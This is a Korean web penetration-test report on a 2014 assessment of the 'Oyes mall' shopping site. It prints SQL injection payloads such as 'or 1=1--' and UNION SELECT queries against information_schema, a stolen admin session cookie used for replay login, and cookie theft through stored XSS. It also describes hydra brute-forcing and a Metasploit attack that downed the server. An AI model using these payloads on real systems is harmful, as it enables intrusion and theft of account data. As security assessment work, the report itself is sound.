웹

Transcription

1 웹서비스모의침투 (Oyes mall 쇼핑물 ) by hyd3(hyde0401@gmail.com)

2 Contents 1. 개요 모의해킹정의 수행일정 / 수행인원 수행대상및장소 수행단계별방법 침투시나리오 점검항목 점검도구 결과요약 영향도평가기준 총평 취약점요약 상세설명 환경분석 SQL Injection (BP-027) 인증우회 (BP-003 ~ 005) 디렉토리리스팅취약점 (BP-013) XSS(CSRF) 취약점 (BP-008 ~ 012) 파라미터조작 (BP-006 ~ 007) 페이지

3 3.7. 에러메시지처리 (BP-012) 페이지내중요정보노출 (BP-16 ~ BP19) 파일다운로드 (BP-023) 파일업로드 (BP-024) 불필요파일존재 (BP-20 ~ BP22) 최신취약점미패치 (BP-28) 불필요파일존재 (BP-014 ~ BP015) [ 대응방안 ] SQL Injection 인증우회 디렉토리리스팅취약점 XSS(CSRF) 취약점 파라미터조작 에러메시지처리 페이지내중요정보노출 파일다운로드 파일업로드 불필요파일존재 최신취약점미패치 관리자페이지추측 페이지

4 1. 개요 1.1. 모의해킹정의 본모의해킹진단은 Oyes mall 서비스의관련된모든정보자산에대해취약점을도출 / 분석하여대책을수립하기위함입니다. 해커와동일한환경과조건, Hacking Skill 을가지고모의적인침투에의해이루어지며, 발견된취약점에대해서는사전적인예방을통한효과를발생시키는데목적이있습니다 수행일정 / 수행인원 본모의해킹은 2014 년 6 월 9 일부터 ~ 2014 년 6 월 27 일까지진행이되며, 총 1M/M 가 투입됩니다. Task 별자세한일정은아래표와같습니다. 6 월 9 일 ( 월 ) 6 월 10 일 ( 화 ) 6 월 11 일 ( 수 ) 6 월 12 일 ( 목 ) 6 월 13 일 ( 금 ) 환경분석 BP-027 BP-003 ~ 005 BP-013 BP-008 ~ 월 16 일 ( 월 ) 6 월 17 일 ( 화 ) 6 월 18 일 ( 수 ) 6 월 19 일 ( 목 ) 6 월 20 일 ( 금 ) BP-006 ~ BP-007 BP-012 BP-016 ~ BP-019 BP-023 BP 월 23 일 ( 월 ) 6 월 24 일 ( 화 ) 6 월 25 일 ( 수 ) 6 월 26 일 ( 목 ) 6 월 27 일 ( 금 ) BP-020 ~ BP-022 BP-028 BP-014 ~ BP-015 최종보고서작성 최종보고서작성 [ 표 1-1] 모의해킹진단일정 3 페이지

5 1.3. 수행대상및장소 본모의해킹은아래대상을전달받았으며, Task 별로해당대상에대해점검이이루어집니다.. 구분 (Task) 대상도메인대상 IP 정보서비스 외부모의해킹 :83 Oyes mall 웹서비스 [ 표 1-2] 모의해킹수행범위 본모의해킹은외부아이피대역에서진행하였으며, 수행자의아이피는담당자에게사전에 전달합니다. 장애가발생시담당자에게즉각보고하게됩니다. 구분 (Task) 수행자 IP 장소 외부모의해킹 ~130 보안프로젝트랩실 [ 표 1-3] 모의해킹수행자정보 1.4. 수행단계별방법 본모의해킹은아래단계별로정보수집부터결과보고서까지과정을통해진행이됩니다. [ 그림 1-1] 모의해킹과정 4 페이지

6 각단계별수행에대한간략한내용은아래표와같습니다. 수행단계설명정보수집대상에대한서버 / 네트워크 / 서비스에대한불필요한서비스접근가능성, 외부에서파악할수있는정보들을수집하는단계취약점수집각네트워크구간별로적합한취약점스캔도구를이용하여발생할수있는취약점에대한정보를수집하는단계 ( 단, 네트워크장비 / 서비스에장애를유발할수있는경우에는제외 ) 침투단계취약점수집단계를통해획득한정보를기반으로수동점검 (Manual) 을통해내부시스템까지침투할가능성이있는지시나리오기반으로접근하는단계상세분석취약점이도출되었을경우에공격에의해서보안위협이시스템및비지니스측면에서어느정도의영향을줄수있는지분석하는단계보고서작성도출된취약점에대한총평 / 영향도 / 상세분석 / 보안가이드가포함된보고서를작성하는단계 [ 표 1-4] 모의해킹수행단계 1.5. 침투시나리오 본모의해킹중외부모의해킹 (Task1) 은외부에서비인가자입장에서외부에서노출되어있는 서비스를대상으로이루어지며, 진단서비스의취약점시나리오는각취약점상세내역에 포함되어있습니다. [ 그림 1-2] 진단시나리오 1 네트워크대역의모든정보를획득한다. ( 네트워크장비의최신버전미패치에취약점공격 가능 ) 5 페이지

7 2 IDS/IPS 에대한패턴탐지룰우회공격시도를통해웹서버공격시도합니다. 3 WEB 서버 / 어플리케이션에서발생할수있는취약점을이용하여내부서버침투를시도합니다.. ( 공격기법은 OO 표참고 ) 4 WAS 플랫폼에서발생할수있는최신취약점에대한공격을시도합니다. 5 데이터베이스 / 로그서버등에침투를하여개인정보 / 사내주요정보를획득합니다.. 내부모의해킹진단시접근법은모두동일하나방화벽내부네트워크대역에서진행됩니다 점검항목 점검항목은 OWASP TOP 10, SANS TOP 25, KISA 48 대취약점항목등을기반으로제작된자사의 취약점점검방법론을이용하여진행됩니다. 순번분류코드진단항목 1 계정정보추측및대입 BP-001 BP-002 취약한패스워드설정여부 어플리케이션 / 장비기본패스워드설정여부 BP-003 쿠키재사용 (Replay Attack) 여부 2 인증우회 3 파라미터조작 BP-004 BP-005 BP-006 BP-007 중요페이지세션 / 인증 / 접근체크여부클라이언트측면인증우회허용여부 (Javascript 우회 ) URL 정보내파라미터위 / 변조여부필드값조작에따른검증여부 BP-008 악의적인스크립트필터링여부 (POST 메소드 ) 4 XSS (CSRF) 취약점 BP-009 URL 파라미터스크립트필터링여부 (GET 메소드 ) BP-010 XST, TRACE 옵션허용여부 BP-011 CSRF 취약점허용여부 6 페이지

8 5 에러메시지처리 BP-012 에러메시지를통한중요 / 불필요한정보유출 6 디렉토리리스팅취약점 BP-013 디렉토리인덱싱여부 7 관리자페이지추측 BP-014 페이지내관리자페이지링크여부확인 BP-015 관리자페이지접근여부 BP-016 중요개인정보노출여부 8 페이지내중요정보노 출 BP-017 쿠키값내중요정보유출여부 BP-018 데이터베이스관련정보유출여부 BP-019 사내서내인프라정보노출여부 BP-020 어플리케이션설치후불필요기본페이지존재여 부 9 불필요파일존재 BP-021 백업, 압축등불필요파일존재여부 BP-022 테스트페이지, 데모페이지삭제여부확인 10 파일다운로드취약점 BP-023 입력값검증미흡으로파일다운로드공격가능여 부 11 파일업로드취약점 BP-024 입력값검증미흡으로파일업로드공격가능여부 12 부적절한 Include 허용 여부 BP-025 부적절한 Include 허용여부 13 URL 강제호출 BP-026 비인가페이지강제호출여부 14 SQL Injection BP-027 입력값검증미흡으로 SQL Injection 허용여부 15 최신취약점미패치 BP-028 보안에취약하거나버전이오래된어플리케이션사 용여부 16 부적절한서버설정 BP-029 서버보안설정여부 17 법적요구사항검토 BP-030 개인정보보호법에의한적절성여부체크 [ 표 1-5] 취약점점검방법론 7 페이지

9 1.7. 점검도구 본모의해킹을수행하면서사용된도구는아래와같으며, 자세한메뉴얼은 [ 첨부 1] 점검도구 메뉴얼.doc 를참고하기바랍니다. 도구이름사이트용도메뉴얼 Cain & Abel 스니핑, 패스워드크랙클릭 BeEF 사용자권한획득 Burp Suite Nessus hydra download.cnet.com/hydra/ _ html 프록시도구 서비스취약점스캐닝 패스워드크랙 [ 표 1-6] 취약점점검도구목록 * 점검도구에대한상세가이드는고객요구에따라서포함여부를결정하면한다.. 2. 결과요약 2.1. 영향도평가기준 영향도는총 5 개기준 (VH, H, M, L, VL) 으로구분되었으며, 외부 / 내부서비스침투여부및정보 노출여부에따라아래와같은기준으로평가되었습니다. 영향도매우높음 (VH) 매우높음 (H) 중간 (M) 낮음 (L) 설명 - 외부노출된서비스를통해내부네트워크대역에침투가가능하여개인정보및사내주요정보들이외부노출위험성이존재 - 시스템에심각한영향을발생하여비지니스적인피해를줄위험성이존재 - 시스템에일부심각한영향을발생하나 2차적인피해발생이이루어질가능성이적음 - 외부노출된서비스를통해시스템정보및중요정보가제한된환경에서만노출 - 추가적인공격가능성을줄수있는정보노출 8 페이지

10 매우낮음 (VL) - 서비스에영향을미치지않고일부불필요한정보가노출 [ 표 2-1] 영향도평가기준 * 영향도기준은환경에따라달라질수있습니다 총평 전체몇개취약점이발견되었으며영향도최상 (VH) : 7 개, 상 (H) : 4 개, 중 (M) : 0 개총 0 개의 취약점이도출되었습니다. 주요취약점은아래와같습니다. [SQL Injection] 해당 OyesMall 웹어플이케이션은로그인우회점검, 에러기반점검, 문자열기반점검등다양한취약점을점검하였습니다. 그중 SQL 쿼리와웹페이지의에러를이용하여서버의 DB 정보와 DB 내의테이블정보를검출할수있었습니다. 최종적으로이러한에러를이용하여관리자의계정을알아내로그인에성공할수있었고때문에 [VH] 에해당합니다. [ 인증우회 ] 해당 OyesMall 웹어프리케이션의회원정보수정서비스를이용하여취약점을점검하였고그 결과해당웹어플리케이션은세션관리에미흡하다는결과가나왔습니다. 또한게시판을 이용하여모의침투가이루어졌으며사용자의세션정보를탈취하고탈취한사용자의 ID 로 로그인에성공하였으므로이는 [VH] 에해당합니다. [XSS(CSRF) 취약점 ] 해당 OyesMall 웹어플리케이션의게시판, 검생창, 회원가입, 장바구니서비스에서 XSS 취약점점검을수행하였습니다. 특히 Q&A 게시판에서는악의적스크립트가내포된게시물을올리고접근하는사용자에게악성코드를배포하는등의공격에성공하였으므로이취약점은 [VH] 에해당합니다. [ 파라미터조작 ] 해당 OyesMall 웹어플리케이션의게시판중 Q&A 게시판의파라미터를조작하는취약점점검을수행하였고게시판에서비밀번호를제외한모든입력란에파라미터를조작할수있었습니다. 나아가이를활용, 관리자의계좌정보가담긴게시물을변조역시성공하였는데이는막대한금전적피해를입힐수있기때문에 [VH] 에해당합니다. 9 페이지

11 [ 에러메시지처리 ] 해당 Oyes mall 의 URL 검색창에서에러메시지처리미흡에대한취약점이발견되었습니다. 이취약점을활용하여서버에대한정보를획득할수있었으며이는 [H] 에해당합니다. [ 페이지내중요정보노출 ] 회원정보페이지내에주민등록번호가직접적으로노출되어있었고특수문자를통해표기되어 안전할것이라고예상했던비밀번호역시개발자도구등을통해간단히확인이가능하였습니다. 이는페이지내에서불필요하게개인정보가노출되는취약점에해당하며 [H] 에해당합니다. [ 파일다운로드 ] 해당 OyesMall 웹어플리케이션에게시판중 Q&A 게시판에서취약점점검을수행하였습니다. 그결과업로드된파일을통해경로를유추하여업로드된파일이아닌해당웹서버에서민감한 파일, 예를들어소스 /DB 관련파일의다운로드에성공하였습니다. 이는 [H] 에해당합니다. [ 파일업로드 ] 해당 OyesMall 웹어플리케이션은개발자가지정한파일의확장자이외의다른확장자의파일을업로드하지못하게되어있습니다. 하지만확장자를우회게되면파일을손쉽게업로드할수있는데예를들어 (.asp) 파일을 (.asp.txt) 파일로변환하는등다양하게업로드가능하며프록시도구를이용하여변환된확장자파일을본래의확장자파일즉개발자가지정한이외의파일로쉽게변환할수있습니다. 또한이러한취약점을이용하여악성코드배포가가능한것을확인하였는데이는 [VH] 에해당합니다. [ 불필요한파일존재 ] 해당 OyesMall 웹어플리케이션에 /demoshop/shop_board/ 디렉토리내에백업파일인 (shop_board.zip) 이존재하였고다운로드에도성공하였습니다. 이러한백업파일이나압축파일등은웹서버의디렉토리상에존재해서는안되며다른곳에따로보관하여야하여야하는데이는 [H] 에해당한다. [ 최신취약점미패치 ] 일반개인사용자같은경우최신취약점에대한패치가자유로운반면에서비스중인웹 어플리케이션은지속적으로서비스를해야하기때문에최신취약점에대한패치가자유롭지 10 페이지

12 못합니다. 이러한취약점에대해시스템취약점점검도구를이용하여해당서버의취약점을 스캔후최약점결과를이용하여가장취약한부분을메타스플로잇을이용하여모의침투를 하였습니다. 그리고그결과서버를다운시키는데성공하였으며이는 [VH] 에해당됩니다. [ 관리자페이지추측 ] 해당 OysMall 웹어플리케이션은 Red Zone 즉, 관리자의로그인페이지에일반사용자도접근할 수있습니다. 이를활용하여 hydra 패스워드탈취도구를이용, 관리자의비밀번호를탈취할수 있었으며이는 [VH] 에해당한다 취약점요약 본모의해킹진단모든서비스에서발생한대상별취약점은아래표와같습니다. 상세한정보는 모의해킹진단상세내역 을참고하기바랍니다. 서비스 취약점 요약 페이지내중요정보추출 회원가입서비스에서사용자의패스워드가육안으로는암호화처리가되있는듯보이지만브라우져의개발자도구나프록시도구, 스니핑도구를이용하여패스워드가평문화되어있는것을확인가능함 회원가입 회원정보수정서비스에서 <document.cookie> 객인증우회체를이용해사용자의세션정보를탈취하여게시 판을이용해 Replay Attack 수행가능 SQL 쿼리문을이용하여회원가입입력폼에에 SQL Injection 러를이용하여공격자가원하는정보를추출하여문자열기반의 SQL Injection의취약점을발견할 수있음. 로그인 SQL Injection SQL 쿼리문을이용하여로그인입력폼에에러를이용하여공격자가원하는정보를추출할수있다. 특히고객사의이해를돕기위해에러를이용한 SQL Injection을수행하였음. 게시판 XSS 취약점 게시판서비스에악성스크립트삽입및다른사용자권한획득및웜바이러스배포가능 11 페이지

13 게시판에업로드한파일을다운로드시프록시도 파일다운로드취약점 구를이용하여업로드한파일이아닌소스코드를 다운받을수있음 게시판에개발자가지정한파일확장자이외의 파일업로드취약점 파일을확장자를우회하여업로드할수있고 웹쉘을업로드하고실행가능함 SQL Injection Sql 쿼리문을이용하여검색창에에러를이용하여사용자가원하는정보를추출할수있다. 검색창을이용하여스크립트구문을출력할수 검색 XSS 있고 <document.cookie> 객체를이용하여사용자의쿠키값을탈취가능함 에러메시지처리 검색창을이용하여개발자가의도하지않는문 자열을삽입하여불필요한에러메세지를볼수있음 RED ZONE 관리자페이지추측 사용자가볼필요가없는 red zone 영역을통하여관리자페이지를추측할수있음 [ 표 2-2] 서비스별발생취약점요약 12 페이지

14 3. 상세설명 3.1. 환경분석 [ 그림 3-1] Oyes mall 사용웹언어확인 Oyes mall 의각페이지로접근하게되면각페이지들이 *.asp 으로저장되어있는것을보이는데 이를통해본서비스페이지들이 asp 로구성되어있음을확인하였습니다. 또한사이트맵을 통해서 Oyes mall 이어떠한서비스를제공하는지에대해확인해보면총 41 개페이지중 정상적으로서비스를제공하는페이지는 13 개임이확인되었습니다. 다음으로웹서비스를제공하는서버자체의환경구성에대한정보를수집합니다. [ 그림 3-2] nmap 을활용한 Web Server Scan 13 페이지

15 [ 그림 3-2] 는 Network Scanning Tool 인 nmap 을활용하여 Oyes mall 을제공하는서버에 스캔을시도한결과로현재서버는 Windows Sever 2003 기반으로 Database 는 MSSQL 을 사용하고있고현재 11 개의포트가열려있는것을확인하였습니다. 서비스종류상세설명 Operating System Microsoft Windows Server 2003 SP1 or SP2 Programming Language ASP Database MS-SQL 80/http 81/hosts2-ns 82/xfer 83/mit-ml-dev 84/ctf 허용 Port(tcp) 135/msrpc 139/netbios-ssn 445/Microsoft-ds 1025/NFS-or-IIS 1433/ms-sql-s 2383/ms-olap4 점검페이지수 13 [ 표 3-1] 환경분석결과 [ 표 3-1] 는환경분석의결과를정리한것으로취약점점검은총 13 개의페이지에대해이루어집니다. 14 페이지

16 15 페이지

17 3.2. SQL INJECTION (BP-027) 취약점개념설명 [ 그림 3-3] SQL Injection 시나리오 Structured Query Language 의약어로데이터베이스에접근할수있는데이터베이스의하부언어라고할수있습니다. 그리고웹어플리케이션의경우사용자의입력값을이 SQL 을통해데이터베이스와의통신을하게됩니다. 하지만 SQL 역시인터프리터언어의일종이기때문에다른인터프리터언어와같이사용자가입력한데이터를받은후형식에맞게변환하여실행됩니다. 이때사용자가제공하는데이터와프로그래머가작성한명령어와뒤섞여실행되므로만약사용자에의해예상치못한값을입력받게되면프로그래머가의도하지않은방식으로웹어플리케이션이동작하게됩니다 취약점점검 (1) 사용자인증우회점검 서비스위치 [login] 서비스 URL 파라미터정보 - [ 표 3-2] 사용자인증에대한점검위치본점검은 Oyes mall 로그인폼의입력값에대한점검으로만약입력값에대한정확한검증이이루어지지않는다면비정상적인 SQL Query 가입력된다해도전달하여사용자인증을우회하게됩니다. 예를들어현재데이터베이스의 user_info 라는테이블의구조가아래와같다고가정하겠습니다. user_id user_pwd user user [ 표 3-3] user_info Table 구조 16 페이지

18 현재사용자계정의정보를관리하는 user_info 테이블에는 user01, user02 라는두개의계정이 등록되어있으며각각의비밀번호는 user_pwd 라는컬럼에저장이되어있습니다. [ 그림 3-4] 사용자인증정보입력 이때 [ 그림 3-4] 와같이로그인폼에 user01 에대한인증정보를입력하게되면 SELECT user_id, user_pwd from user_info where user_id ='user01' and user_pwd= '1234' ; 와같은쿼리문에생성되어실제데이터베이스에사용자가입력한계정정보에부합하는계정이있는지확인하고만약있다면로그인성공, 없다면로그인실패하게됩니다. 하지만만약사용자인증우회에대한적절한처리를하지않은웹페이지라면이쿼리문에비정상적인, 즉이러한인증폼을우회하는방식으로사용자계정정보를입력하게되었을때별다른에러없이인증이가능하게됩니다. 예를들어아래의쿼리는기존쿼리와는달리계정에 user01 이아니라 user01 or 1=1-- 라는문장을입력하였고 ms-sql 의경우 --는주석처리를의미합니다. 때문에 1=1-- 이후의문장은전부주석처리가됩니다. SELECT user_id, user_pwd from user_info where user_id ='user01' or 1=1-- and user_pwd= '1234' ; 주석처리가된다면입력한비밀번호와는상관없이로그인에성공하게되는데이를사용자인증우회합니다. 17 페이지

19 [ 그림 3-5] 로그인우회점검용치트시트 [ 그림 3-5] 는로그인인증우회에대한치트시트이며본점검에서는이치트시트를활용하여 사용자인증우회에대한점검을진행하였습니다. [ 그림 3-6] Oyes mall 로그인우회점검 점검 결과 [ 그림 3-5] 의치트시트의쿼리로는우회가불가능하였으며로그인우회공격으로부터는 안전합니다. (2) 에러기반의점검 에러기반점검은문자열검색을통해에러페이지를출력하게하고, 해당페이지를통해 데이터베이스종류, 데이터등의정보를습득하는점검방식입니다. 가장대표적인방법으로는 아래와같이검색창에싱글쿼터 ('), 더블쿼터 ('') 를입력하여에러발생여부를판단하게됩니다. 18 페이지

20 [ 그림 3-7] 싱글쿼터를활용한에러기반의점검 [ 그림 3-7] 와같이검색창에싱글쿼터 ( ) 를입력함으로써에러기반의점검에대한취약성이 존재하는지확인할수있습니다. [ 그림 3-8] 에러기반의점검결과 싱글쿼터를활용한점검을통해 [ 그림 3-8] 과같이에러페이지에서현재 Oyes mall 의웹서버가 MS-SQL, ASP 등을사용하고 있다는정보를확인하였으며현재웹사이트는에러기반의 SQL Injection 공격에노출되었습니다. (3) 문자열데이터기반의점검 ( 연결연산자를활용한점검 ) 각데이터베이스는저마다의연결연산자를갖고있는데이번점검은이연결연산자를활용하여 SQL Injection 취약점점검을진행합니다. 19 페이지

21 데이터베이스종류연결연산자 Oracl MS-SQL + MySQL [ 표 3-4] 데이터베이스별연결연산자연결연산자를활용한점검은 SQL 쿼리문내연결연산자로연결된항목들은그냥작성한문장과일치한다는점을활용한점검방식입니다. SELECT user_id, user_pwd from user_info where user_id ='user01' and user_pwd= '1234' ; 일반적으로사용되는전형적인 select 문의예시로아무런문제가없는쿼리문입니다. SELECT user_id, user_pwd from user_info where user_id ='use+r01' and user_pwd= '1234' ; user01 라는문자열표현을위해 use 와 r01 이라는문자열을연결연산자를연결했다는표현상의차이를제외하곤완전히일치하는문장입니다. [ 그림 3-9] 연결연산자를활용한점검타겟설정 [ 그림 3-9] 는연결연산자를활용한점검을하기위해가입한계정으로현재이메일은 hyde0401@gmail.com 으로등록되어있습니다. 만약이계정페이지에연결연산자취약점이존재한다면 hy + de0401@gmail.com 으로수정한다해도다시읽어왔을때 hyde0401@gmail.com 으로인식해야합니다. 20 페이지

22 [ 그림 3-10] 연결연산자입력와그결과 연결연산자를중간에입력하고저장하였으나실제로등록된정보는 으로 현재웹사이트는문자열기반의 SQL Injection 공격에노출되어있습니다. (4) 정수데이터기반의점검 정수데이터기반의점검방식은연결연산자방식과유사한데정수데이터를입력하는부분에서 단순값과산술연산자를통한연산값이이와같은결과를내는지에대해점검합니다. [ 그림 3-11] 정수기반의점검결과 [ 그림 3-11] 은 Oyes mall 에대해정수기반의점검을시도한결과로임의의게시물을열어해당게시물을확인하였습니다. 해당게시물은 n_open=1 로테스트페이지였는데이를 url 에서 n_open=2-1 로정정하여재접근해본결과동일한게시물에접근하는것을확인하였으며현재웹사이트는정수기반의 Injection 공격에노출되었습니다. (5) 응답기반의점검 21 페이지

23 쿼리문을전송하고이쿼리의참, 거짓여부를활용하여데이터를얻어내는점검방식을 말합니다. [ 그림 3-12] 응답기반의점검 - 참변환 [ 그림 3-12] 는 Oyes mall 에응답기반의점검을시도한것으로웹페이지를여는 url 끝부분에 and 1=1-- 를추가하였을때만약응답기반의취약점이존재한다면 and 이후문장의참 / 거짓여부에따라정상 / 에러페이지가결정된다. 그결과먼저입력한 1=1 은참이고 Oyes mall 은응답기반의취약점에노출되어있어정상적으로페이지가출력됩니다. 현재웹사이트는응답기반의 SQL Injection 에노출되어있습니다 모의침투 점검을통해 Oyes mall 은 SQL Injection 취약점에노출되었음을확인하였습니다. 다음으로모의 침투에서는 select 문을활용하여 Oyes mall 의데이터베이스에저장된회원정보를얻어내고자 합니다. 우선데이터베이스임의열람가능여부를점검해야하는데이에앞서데이터베이스의정보를 담고있는스키마와테이블에대해확인합니다. INFORMATION_SCHEMAS : 데이터베이스의정보를담고있으며모든 Table 과 Column 의 정보역시포함하고있습니다. 데이터베이스종류연결연산자 TABLES DB 내의모든테이블정보 COLUMNS DB 내의모든컬럼정보 [ 표 3-5] INFORMATION_SCHEMAS 의 Table 데이터베이스에직접접근해서원하는타켓테이블과컬럼명을조회하기위해서는모든테이블정보를담고있는 INFORMATION_SCHEMAS 를조회해야합니다. 또한조회의결과를출력하기 22 페이지

24 위해웹페이지에서테이블과컬럼을출력할공간이필요합니다. 이출력할공간은이전에정수 기반의취약점이존재한페이지를활용할것이며이페이지에서몇개의항목이출력가능한지 확인하기위해 order by 문을활용합니다. [ 그림 3-13] 타겟페이지의컬럼수조회 이페이지에서몇개의항목이출력가능한지확인하기위해 order by 문을활용합니다. [ 그림 3-13] 과같이 order by 문을활용하여타겟페이지에서활용하는컬럼수를조회해야합니다. 조회방법으로는 1 부터순차적으로 order by 1, order by 2 와같이에러페이지발생시까지 조회하는방식이있습니다. 이러한조회의결과, 3 에서에러가발생하며모의침투에서는 2 개의 컬럼을활용합니다. 이제부터는이취약한페이지를통해직접 INFORMATION_SCHEMAS 에 접근하게됩니다. [ 그림 3-14] 출력부확인 +union+select+1,2+from+information_schema.tables-- 23 페이지

25 취약한페이지의 url 의뒷부분에위의문장을추가하는데이는기존페이지의쿼리문과직접 작성한쿼리문을 union 연산자를활용하여결합하는방식입니다. 이때첫번째컬럼인 1 의 위치에출력할테이블이나컬럼명이바로저 1 의위치에출력됩니다. [ 그림 3-15] Table 명출력 (1) +union+select+table_name,2+from+information_schema.tables-- 출력할첫번째컬럼을 Table_name 으로변경하면하게됩니다. [ 그림 3-14] 에서 1 이있던위치에현재웹사이트에연동된데이터베이스가갖고있는테이블 명이출력됩니다. 하지만현재데이터베이스에는많은수의테이블명이존재하기때문에잘린부분에대해 확인하기위해서조건을주어야합니다. 24 페이지

26 [ 그림 3-16] Table 명출력 (2) +union+select+table_name,2+from+information_schema.tables+where+table_name>'member'-- 끝에조건으로 member 라는 Table name 이하로출력해달라는조건문을추가하였고그결과 [ 그림 3-16] 과같이이전에보지못했던문장을확인할수있습니다. 이와같은방식으로원하는테이블명과컬럼명을확인할수있으며좀더수작업을한다면 관리자혹은사용자의계정과비밀번호, 데이터베이스의정보등원하는정보를얻을수있을 것입니다. 25 페이지

27 [ 그림 3-17] perl 을활용한코딩 [ 그림 3-17] 은데이터베이스의임의열람을통해얻은정보중원하는정보만을필터링하여 정리하기위해스크립트언어인 perl 을활용하여작성한도구입니다. [ 그림 3-18] 실행결과 [ 그림 3-18] 은프로그램실행결과로 Oyes mall 에등록된사용자계정들을출력합니다 대응방안 3.3. 인증우회 (BP-003 ~ 005) 취약점개념설명 26 페이지

28 쿠키는웹어플리케이션이사용자를구분할때사용하는 HTTP 프로토콜의요소중하나입니다. 클라이언트는접속시이쿠키를부여받고이를통해이후별도의인증없이해당웹서버로의 접근이가능하게됩니다. 이쿠키에대한보안정책을마련해두지않는다면공격자에의해저장된쿠키값이활용되어 특정사용자로쿠키인증에성공하면별도의인증없이해당사용자의권한으로서비스를이용할 수있게됩니다 취약점점검 (1) 쿠키재사용 (Replay Attack) 여부 서비스위치 login 서비스 URL 파라미터정보 - [ 표 3-6] 쿠키재사용점검위치 [ 표 3-6] 은쿠키재사용여부에대한점검위치로 Oyes mall 의로그인폼에서해당취약점에대한점검이 이루어집니다. [ 그림 3-19] Oyes mall 쿠키재사용여부확인을위한로그인 [ 표 3-6] 은쿠키재사용여부에대한점검위치로 Oyes mall 의로그인폼에서해당취약점에대한점검이 이루어집니다. 27 페이지

29 [ 그림 3-19] 는쿠키재사용여부확인을위해 admin 을생성하고로그인하는과정입니다. [ 그림 3-20] Burp Suite 을활용한쿠키스틸 [ 그림 3-20] 은프록시도구인 Burp Suite 를활용하여로그인시의쿠키값을가로채어비교한 것으로 Oyes mall 의쿠키값은항상일치하며별도의암호화없이노출된다는것이 확인되었습니다. (2) 중요페이지세션 / 인증 / 접근체크여부 서비스위치 [Red Zone] 서비스 URL 파라미터정보 - 28 페이지

30 [ 표 3-7] 중요페이지세션 / 인증 / 접근체크점검위치 관리자페이지는사용자에게공개되어서는안되는페이지로일반사용자의계정으로는 접근되어서는안되는중요페이지라고할수있습니다. [ 그림 3-21] Oyes mall 관리자페이지접근 기본 Oyes mall 홈페이지에서 [ 그림 3-21] 과같이우측상단의 Red Zone 을클릭하여접근하면관리자페이지로의접근이 가능합니다 모의침투 가로챈쿠키값을통해사용자인증에성공하면본래쿠키사용자의권한을그대로사용할수 있게됩니다. 본모의침투에서는 29 페이지

31 [ 그림 3-20] 에서가로챈 admin 계정의쿠키값을사용하여사용자인증을진행합니다. ASPSESSIONIDSAARCQQR=AEMHMFDDAEHAKOOAJDACNPMP; oyesorder=oyes%5forder= 오류! 참조원본을찾을수없습니다.] 가로챈쿠키값입력 오류! 참조원본을찾을수없습니다.] 에서는 cooxie tool bar 를활용하여아직로그인되지않은 Oyes mall 홈페이지에서로그인전의쿠키값을 admin 계정의쿠키값으로변경하고 재접근하였습니다. 그결과, [ 그림 3-22] 과같이 admin 계정으로의사용자인증에성공하여 admin 계정의권한 그대로 Oyes mall 의서비스를자유롭게이용할수있습니다. 30 페이지

32 [ 그림 3-22] 쿠키를활용한로그인 만약이와같이일반사용자가아닌관리자의쿠키를가로채어게시물을을수정하게되면일반 사용자에게더큰피해를줄수도있습니다. 이러한게시물에대한수정취약점은 BP-006 ~ 007 취약점상세설명을통해확인하도록하겠습니다 대응방안 31 페이지

33 3.4. 디렉토리리스팅취약점 (BP-013) 취약점개념설명 디렉토리리스팅취약점이란서버설정상의이유로서버에대한디렉토리나파일의목록이웹 페이지를통해노출되어일반사용자들이허가되지않는행위가가능하도록하는취약점입니다 취약점점검 점검 url [ 표 3-8] 디렉토리리스팅취약점점검위치 점검결과 X X X X X 디렉토리리스팅취약점을점검하기위해기존의메인페이지에서 [ 표 3-1] 의위치에대해 접근을시도해보았으나 [ 그림 3-23] 와같이 Oyes mall 의홈페이지는디렉토리리스팅에대한취약점에노출되지 않았음을확인하였습니다. [ 그림 3-23] 디렉토리리스팅취약점점검 대응방안 32 페이지

34 3.5. XSS(CSRF) 취약점 (BP-008 ~ 012) 취약점개념설명 Cross Site Scripting 의약어로악의적인코드를웹컨텐츠로보내는공격방식을말합니다. URL 혹은웹사이트내의취약한폼필드에스크립트로짜여진악의적인코드를삽입하여만약해당웹사이트의사용자가이컨텐츠를실행하게되면그사용자의컴퓨터에서스크립트가실행되고공격자의의도대로동작하게됩니다. 즉간단히요약하면 XSS 는공격자가입력한스크립트를다른사용자의컴퓨터에서실행시키는 것이라고할수있습니다. Stored XSS 게시판에는일반적인문자열뿐만아니라 HTML 태그나스크립트역시입력할수있습니다. 공격자는스크립트나태그가필터링되지않은게시판에악성스크립트를작성하여게시물을보는관리자나일반사용자의정보를가로채는 XSS 취약점입니다. 이를활용하면권한상승, 악성코드유포등이가능합니다. Reflected XSS 공격자가스크립트코드를작성하여올려놓은조작한 URL( 링크 ) 을일반사용자가클릭하게하여 공격자가의도한악성코드를실행시키도록하는 XSS 취약점입니다. DOM 기반의 XSS DOM 은프로그램과스크립트가동적으로문서의내용, 구조및스타일을접근하고업데이트할수있도록하는플랫폼과언어의중간인터페이스입니다. 이는페이지가전부각각의객체로되어있어특정작업을할때서버로전송되지않고객체자체에서작업을수행하고결과를반환해줍니다. 만약 Javascript 를이용하여페이지자체를변조 XSS 공격을시도하게되면악성스크립트가웹서버에도달하지는않게되고클라이언트에서처리되는데서버에서저장시키는것만아니라면큰문제가발생하지않습니다. 하지만클라이언트에서처리후서버로저장시키는루트라면 DOM 기반의 XSS 에대한방어대책이필요하게됩니다. 33 페이지

35 34 페이지

36 취약점점검 (1) 악의적인스크립트필터링여부 (POST 메소드 ) - Stored XSS 서비스위치 [HOME] > [ 게시판통합 ] > [Q & A 게시판 ] 서비스 URL 파라미터정보 - [ 표 3-9] Stored XSS 취약점점검위치 http form 에서입력한자료나선택한자료를다른파일에전달해야하는데, 이때 GET 방식이나 POST 방식을사용합니다. GET / POST 방식모두파일값에전달하는메소드이나 GET 은 URL 창을통해파라미터가노출되는정달방식이며 POST 방식은파라미터가 Header 에포함되기때문에 URL 을통해서는파라미터가노출되지않는방식입니다. POST 메소드를활용한 Stored XSS 공격에대한점검으로 Stored XSS 는게시판등의공간에스 크립트를업로드해야하기때문에 Oyes mall 에서는 Q&A 게시판을활용합니다. [ 그림 3-24] XSS 취약점점검을위한스크립트삽입및실행 현사용자의쿠키를출력하는문장을메시지박스로실행하는스크립트를삽입하여저장한후 해당게시물에접근하면 [ 그림 3-24] 와같이스크립트가실행하는것이확인됩니다. 현재 Oyes mall 은 XSS 취약점에 노출되어있습니다. 35 페이지

